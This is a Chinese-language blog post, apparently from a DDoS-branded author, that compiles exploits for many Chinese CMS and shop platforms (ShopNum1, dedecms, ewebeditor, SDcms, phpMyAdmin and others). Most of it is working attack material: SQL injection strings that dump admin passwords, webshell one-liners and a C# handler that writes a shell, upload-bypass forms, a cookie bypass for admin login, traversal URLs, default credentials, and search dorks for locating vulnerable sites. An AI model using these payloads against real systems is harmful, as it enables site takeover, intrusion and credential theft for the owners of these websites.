中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

大金分享常用的主流WEB漏洞,EXP合集

發布時間:2020-06-14 21:40:03 來源:網絡 閱讀:4518 作者:大金DDOS 欄目:開發技術

啟航企業建站系統 cookie注入漏洞通殺所有版本

直接上exploit:
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 

1,username,password,4,5,6,7,8,9,10 from admin"));
test:http://www.33ddos.com/system/xitong/shownews.asp?id=210
-----------------------------------------------------------------------------------------------------
Asprain論壇 注冊用戶 上傳圖片就可拿到webshell    ddos*** www.33ddos.com   DDOS  

Asprain是一個適合于各中小學、中專、技校、職高建設校園論壇、師生交流論壇,一些教科研部門、公司企業建設

內部論壇、IT技術愛好者建設技術交流論壇的免費論壇程序。
1.txt存放你的一句話馬 如:<%execute(request("cmd"))%>
2.gif 為一小圖片文件,一定要小,比如qq表情圖片
3:copy /b 2.gif+1.txt 3.gif 這樣就偽造了文件頭,但是現在傳上去還不行,我接下來就用
4:copy /b 3.gif+2.gif 4.asp ok,現在文件頭和文件尾都是正常的圖片文件了
5.q.asp;.gif
google:Powered by Asprain
-----------------------------------------------------------------------------------------------------
ShopNum1全部系統存在上傳漏洞。

首先 在 http://www.33ddos.com/product.html 頁面查看任意產品詳細說明。
按說明 提示登錄后臺。。
在后臺功能頁面->附件管理->附件列表
可以直接上傳.aspx 后綴***
http://www.33ddos.com/upload/20110720083822500.aspx
-----------------------------------------------------------------------------------------------------
×××CMS中小企業網站管理系統 上傳漏洞

×××CMS是中企商鋪網專為中小企業網站開發的網站管理系統。
后臺:admin/login.asp
ewebeditor 5.5 Nday
exp:
<form?action="http://www.33ddos.com/Admin/WebEditor168/asp/upload.asp?

action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?

enctype="multipart/form-data">?
<input?type=file?name=uploadfile?size=100><br><br>?
<input?type=submit?value=upload>?
</form>
ps:先上傳小馬.
inurl:member/Register.asp 您好,歡迎來到立即注冊立即登錄設為首頁加入收藏

-----------------------------------------------------------------------------------------------------
YothCMS 遍歷目錄漏洞

優斯科技企業網站管理系統(YothCMS)是一款完全開源免費的CMS。
默認后臺:admin/login.asp
遍歷目錄:
ewebeditor/manage/upload.asp?id=1&dir=../
data:
http://www.33ddos.com/%23da%23ta%23\%23db_%23data%23%23.asa
-----------------------------------------------------------------------------------------------------
Net112企業建站系統 1.0

源碼簡介:
Net112企業建站系統,共有:新聞模塊,產品模塊,案例模塊,下載模塊,相冊模塊,招聘模塊,自定義模塊,友

情鏈接模塊 八大模塊。
添加管理員:
http://www.33ddos.com/admin/admin.asp?action=add&level=2
其實加不加都不是很重要,后臺文件都沒怎么作驗證。
上傳路徑:
http://www.33ddos.com/inc/Upfile.as ... 0&ImgHeight=200
http://www.33ddos.com/inc/Upfile.asp?Stype=2
怎么利用自己研究。
遍歷目錄:
http://www.33ddos.com/admin/upfile.asp?path=../..
如:
http://www.33ddos.com/admin/upfile.asp?path=../admin
http://www.33ddos.com/admin/upfile.asp?path=../data
-----------------------------------------------------------------------------------------------------
易和陽光購物商城通殺 上傳漏洞

前提要求是IIS6.0+asp壞境。
漏洞文件Iheeo_upfile.asp 
過濾不嚴.直接可以iis6.0上傳
把ASP***改成0855.asp;1.gif
直接放到明小子上傳

Google搜索:inurl:product.asp?Iheeoid=

-----------------------------------------------------------------------------------------------------

傳信網絡獨立開發網站源碼0day漏洞

后臺system/login.asp
進了后臺有個ewebeditor
Google 搜索inurl:product1.asp?tyc=
編輯器漏洞默認后臺ubbcode/admin_login.asp
數據庫ubbcode/db/ewebeditor.mdb
默認賬號密碼yzm 111111

拿webshell方法
登陸后臺點擊“樣式管理”-選擇新增樣式 
樣式名稱:scriptkiddies 隨便寫 
路徑模式:選擇絕對路徑 
圖片類型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
圖片類型比如就是我們要上傳的ASP***格式
上傳路徑:/
圖片限制:寫上1000 免的上不了我們的asp***
上傳內容不要寫
可以提交了 
樣式增加成功! 
返回樣式管理 找到剛才添加的樣式名稱 然后按工具欄 在按新增工具欄 
按鈕設置 在可選按鈕 選擇插入圖片然后按》 -然后保存設置
網頁地址欄直接輸入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
上ASP*** 回車 等到路徑

后臺:system/login.asp
Exp:
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
測試:
http://www.33ddos.com/product_show.asp?id=9 and 1=2 union select 

1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
http://www.33ddos.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 

from master
-----------------------------------------------------------------------------------------------------
foosun 0day 最新注入漏洞

漏洞文件:www.33ddos.com/user/SetNextOptions.asp
利用簡單的方法:
暴管理員帳號:
http://www.33ddos.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
暴管理員密碼:
http://www.33ddos.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
-----------------------------------------------------------------------------------------------------
網站程序的版權未知!

默認網站數據庫:
www.33ddos.com/data/nxnews.mdb
ewebeditor 在線編輯器:
編輯器數據庫下載地址:www.33ddos.com/ewebeditor/db/ewebeditor.mdb
登錄地址:ewebeditor/admin_login.asp
默認密碼:admin  admin
登陸后可遍歷目錄:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data

Sql注入漏洞:
http://www.33ddos.com/detail.asp?id=12
exp:
union select 1,admin,password,4,5,6,7,8 from admin
爆出明文帳號/密碼

上傳漏洞:
后臺+upfile.asp
如:
http://www.33ddos.com/manage/upfile.asp 可以用工具。如明小子。
shell的地址:網址+后臺+成功上傳的馬
google:inurl:news.asp?lanmuName=
-----------------------------------------------------------------------------------------------------
dedecms最新0day利用不進后臺直接拿WEBSHELL

拿webshell的方法如下:
網傳的都是說要知道后臺才能利用,但不用,只要 plus 目錄存在,服務器能外連,就能拿shell.
前題條件,必須準備好自己的dede數據庫,然后插入數據:
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, 

\'\');echo "OK";@fclose($fp);{/dede:php}'); 

再用下面表單提交,shell 就在同目錄下 1.php。原理自己研究。。。
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" 

style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
-----------------------------------------------------------------------------------------------------
dedecms織夢暴最新嚴重0day漏洞
bug被利用步驟如下:
http://www.33ddos.com/網站后臺/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST

[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]

=r0t0&_POST[GLOBALS][cfg_dbname]=root
把上面{}上的字母改為當前的驗證碼,即可直接進入網站后臺。
-----------------------------------------------------------------------------------------------------
多多淘寶客程序上傳漏洞 
漏洞頁面:
admin\upload_pic.php
傳送門:
http://www.33ddos.com/admin/upload_pic.php?uploadtext=slide1
PS:copy張圖片馬 直接  xxx.php 上傳抓包地址!
-----------------------------------------------------------------------------------------------------
無憂公司系統ASP專業版后臺上傳漏洞
漏洞文件 后臺上傳
admin/uploadPic.asp
漏洞利用 這個漏洞好像是雷池的
http://www.33ddos.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
等到的webshell路徑:
/UploadFiles/scriptkiddies.asp;_2.gif
-----------------------------------------------------------------------------------------------------
住哪酒店分銷聯盟系統2010
Search:
inurl:index.php?m=hotelinfo
http://www.33ddos.com/index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat

(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
默認后臺:index.php?m=admin/login
-----------------------------------------------------------------------------------------------------
inurl:info_Print.asp?ArticleID=
后臺 ad_login.asp
爆管理員密碼:
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 

from admin
-----------------------------------------------------------------------------------------------------
搜索框漏洞!
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
-----------------------------------------------------------------------------------------------------
關鍵字:
inurl:/reg_TemletSel.asp?step=2
或者
電子商務自助建站--您理想的助手
-----------------------------------------------------------------------------------------------------
iGiveTest 2.1.0注入漏洞
Version: <= 2.1.0
# Homepage: http://iGiveTest.com/
谷歌關鍵字: “Powered by iGiveTest”
隨便注冊一個帳號。然后暴管理員帳號和密碼
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat

(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
-----------------------------------------------------------------------------------------------------
CKXP網上書店注入漏洞
工具加表:shop_admin 加字段:admin
后臺:admin/login.asp 
登陸后訪問:admin/editfile.asp?act= 直接寫馬.也可以直接傳馬:admin/upfile1.asp?path=/
inurl:book.asp 請使用域名訪問本站并不代表我們贊同或者支持讀者的觀點。我們的立場僅限于傳播更多讀者感興

趣的信息
-----------------------------------------------------------------------------------------------------
段富超個人網站系統留言本寫馬漏洞
×××:http://www.mycodes.net/24/2149.htm
addgbook.asp 提交一句話。
連接: http://www.xxxx.tv/date/date3f.asp
google:為防批量,特略!
-----------------------------------------------------------------------------------------------------
智有道專業旅游系統v1.0 注入及列目錄漏洞
默認后臺路徑:/admin/login.asp
默認管理員:admin
默認密碼:123456
SQL EXP Tset:
http://www.33ddos.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 
from admin
-----------------------------------------------------------------------------------------------------
ewebeditor(PHP) Ver 3.8 本任意文件上傳0day
EXP:
<title>eWebeditoR3.8 for php任意文件上EXP</title>
<form action="" method=post enctype="multip
art/form-data"> 
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> 
URL:<input type=text name=url value="http://www.33ddos.com/ewebeditor/" size=100><br> 
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||

php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|

bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||

0|||500|||300|||0|||...|||FF0000|||12|||宋體||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> 
file:<input type=file name="uploadfile"><br> 
<input type=button value=submit onclick=fsubmit()> 
</form><br> 
<script> 
function fsubmit(){ 
form = document.forms[0]; 
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; 
alert(form.action); 
form.submit(); 

</script>
注意修改里面ewebeditor的名稱還有路徑。
-----------------------------------------------------------------------------------------------------
提交’時提示ip被記錄 防注入系統的利用
網址:http://www.xxx.com/newslist.asp?id=122′
提示“你的操作已被記錄!”等信息。
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute

(request("TNT"))寫入一句話。
-----------------------------------------------------------------------------------------------------
西部商務網站管理系統 批量拿shell-0day
這站用的是SQL通用防注入程序 V3.0,恩,這東西可不好繞,我記得當初我有寫過一個文章 通過提交一句話直接拿

shell的..唯一的前提是存儲記錄ip的數據庫必須是.asp或.asa才行..看了下sqlin.mdb 
1:admin_upset.asp 這個文件有個設置上傳后綴的地方.. 很簡單,它直接禁止了asp,asa.aspx 還有個cer可以利用


2:同樣是admin_upset.asp 這個文件不是入庫的 他是直接在htmleditor目錄生成個config.asp文件...Ok不用多說,

插個一句話搞定...注意閉合
3:admin_bakup.asp 備份數據庫的..但是得本地構造...調用了filesystemobject 怎么利用就不強調了..IIS的bug

大家都懂
-----------------------------------------------------------------------------------------------------
JspRun!6.0 論壇管理后臺注入漏洞

SEBUG-ID:20787 發布時間:2011-04-30 影響版本:
JspRun!6.0 
漏洞描述:
JspRun!論壇管理后臺的export變量沒有過濾,直接進入查詢語句,導致進行后臺,可以操作數據庫,獲取系統權限


在處理后臺提交的文件中ForumManageAction.java第1940行
String export = request.getParameter("export");//直接獲取,沒有安全過濾
if(export!=null){
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, 

t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid 

WHERE styleid='"+export+"'");//進入查詢語,執行了...
if(styles==null||styles.size()==0){
<*參考
[email]nuanfan@gmail.com[/email]
*> SEBUG安全建議:

(1)安全過濾變量export
(2)在查詢語句中使用占位符
-----------------------------------------------------------------------------------------------------
烏邦圖企業網站系統 cookies 注入

程序完整登陸后臺:/admin/login.asp
默認登陸帳號:admin 密碼:admin888
語句:(前面加個空格)
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
或者是16個字段:
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
爆不出來自己猜字段。
注入點:http://www.33ddos.com/shownews.asp?=88
getshell:后臺有備份,上傳圖片小馬。備份名:a.asp 訪問 xxx.com/databakup/a.asp
關鍵字:
inurl:shownews?asp.id=
-----------------------------------------------------------------------------------------------------
CKXP網上書店注入漏洞

工具加表:shop_admin 加字段:admin
后臺:admin/login.asp 
登陸后訪問:admin/editfile.asp?act= 直接寫馬.也可以直接傳馬:admin/upfile1.asp?path=/
inurl:book.asp 請使用域名訪問本站并不代表我們贊同或者支持讀者的觀點。我們的立場僅限于傳播更多讀者感興

趣的信息
-----------------------------------------------------------------------------------------------------
YxShop易想購物商城4.7.1版本任意文件上傳漏洞

http://www.33ddos.com/controls/fckedit ... aspx/connector.aspx
跳轉到網站根目錄上傳任意文件。
如果connector.aspx文件被刪可用以下exp,copy以下代碼另存為html,上傳任意文件
<form id="frmUpload" enctype="multipart/form-data" 

action="http://www.33ddos.com/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?

Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
-----------------------------------------------------------------------------------------------------
SDcms 后臺拿webshell

第一種方法:
進入后臺-->系統管理-->系統設置-->系統設置->網站名稱;
把網站名稱內容修改為   "%><%eval request("xxx")'    //密碼為xxx
用菜刀鏈接http://www.xxx.com/inc/const.asp  就搞定了。
第二種方法:
進入后臺-->系統管理-->系統設置-->系統設置->上傳設置;
在文件類型里面添加一個aaspsp的文件類型,然后找一個上傳的地方直接上傳asp文件! 注:修改文件類型后不能

重復點保存!
第三種方法:
進入后臺-->界面管理-->模板文件管理-->創建文件
文件名寫入getshell.ashx
內容寫入下面內容:
/====================復制下面的=========================/
<%@ WebHandler Language="C#" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void Proce***equest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {
return false;
}
}
}
/=============================================/
訪問這個地址:http://www.xxx.com/skins/2009/getshell.ashx
會在http://www.xxx.com/skins/2009/目錄下生成getshell.asp 一句話*** 密碼為xxx 用菜刀鏈接
-----------------------------------------------------------------------------------------------------
ESCMS網站管理系統0day

后臺登陸驗證是通過admin/check.asp實現的

首先我們打開http://www.33ddos.com/admin/es_index.html
然后在COOKIE結尾加上
; ESCMS$_SP2=ES_admin=st0p;
修改,然后刷新
進后臺了嘎..
然后呢…提權,嘿嘿,admin/up2.asp,上傳目錄參數filepath過濾不嚴,導致可截斷目錄,生成SHELL

利用方法,可以抓包,然后改一下,NC上傳,還可以直接用DOMAIN等工具提交.
嘿嘿,成功了,shell地址為http://www.33ddos.com/admin/diy.asp
存在這個上傳問題的還有admin/downup.asp,不過好像作者的疏忽,沒有引用inc/ESCMS_Config.asp,導致打開此頁面

失敗..
在版本ESCMS V1.0 正式版中,同樣存在上傳問題admin/up2.asp和admin/downup.asp都可利用,只不過cookies欺騙不

能用了
-----------------------------------------------------------------------------------------------------
phpmyadmin拿shell的四種方法總結及修復

方法一:
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
----以上同時執行,在數據庫: mysql 下創建一個表名為:study,字段為7on,導出到E:/wamp/www/7.php
    一句話連接密碼:7on
方法二:
讀取文件內容:    select load_file('E:/xamp/www/s.php');
寫一句話:    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
cmd執行權限:    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO 

OUTFILE 'E:/xamp/www/study.php'
方法三:
JhackJ版本 PHPmyadmin拿shell
Create TABLE study (cmd text NOT NULL);
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
select cmd from study into outfile 'E:/wamp/www/7.php';
Drop TABLE IF EXISTS study;
<?php eval($_POST[cmd])?>
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查詢結果為空(即零行)。
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影響列數: 1
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影響列數: 1
DROP TABLE IF EXISTS study;# MySQL 返回的查詢結果為空(即零行)。
方法四:
select load_file('E:/xamp/www/study.php');
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 

'E:/xamp/www/study.php'
然后訪問網站目錄:www.33ddos.com/study.php?cmd=dir
-----------------------------------------------------------------------------------------------------
NO.001中學網站管理系統 Build 110628 注入漏洞

NO.001中學網站管理系統功能模塊:
1.管理員資料:網站的基本信息設置(校長郵箱等),數據庫備份,用戶管理、部門及權限管理等
2.學校簡介:一級分類,可以添加校園簡介,領導致辭、校園風光、聯系我們。。。等信息
3.文章管理:二級分類,動態添加各相關頻道(圖片視頻頻道、學校概況頻道除外)文章等信息
4.視頻圖片管理:一級分類,動態添加視頻或者圖片等信息
5.留言管理:對留言,修改,刪除、回復等管理
6.校友頻道:包括校友資料excel導出、管理等功能
7.友情鏈接管理:二級分類,能建立不同種類的友情鏈接顯示在首頁
默認后臺:admin/login.asp
官方演示:http://demo.001cms.net
×××地址:http://down.chinaz.com/soft/30187.htm
EXP:
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
測試:http://demo.001cms.net/shownews.asp?type=新聞動態&stype=校務公開&id=484 union select 

1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
getshell:后臺有備份,你懂的
另:FCK編輯器有幾處可利用.大家自己行挖掘,由于相關內容較多,我在這里就不說了。

 


向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

新宾| 莲花县| 满城县| 苗栗县| 武夷山市| 南华县| 大田县| 永清县| 襄垣县| 连平县| 大连市| 西和县| 宜章县| 客服| 周口市| 曲沃县| 永顺县| 喀喇| 建昌县| 梁山县| 嘉峪关市| 九台市| 龙川县| 余庆县| 宜良县| 石楼县| 连南| 措勤县| 仁布县| 新丰县| 电白县| 汝阳县| 来凤县| 恩施市| 泰和县| 泰来县| 花莲市| 霍邱县| 富蕴县| 社旗县| 永登县|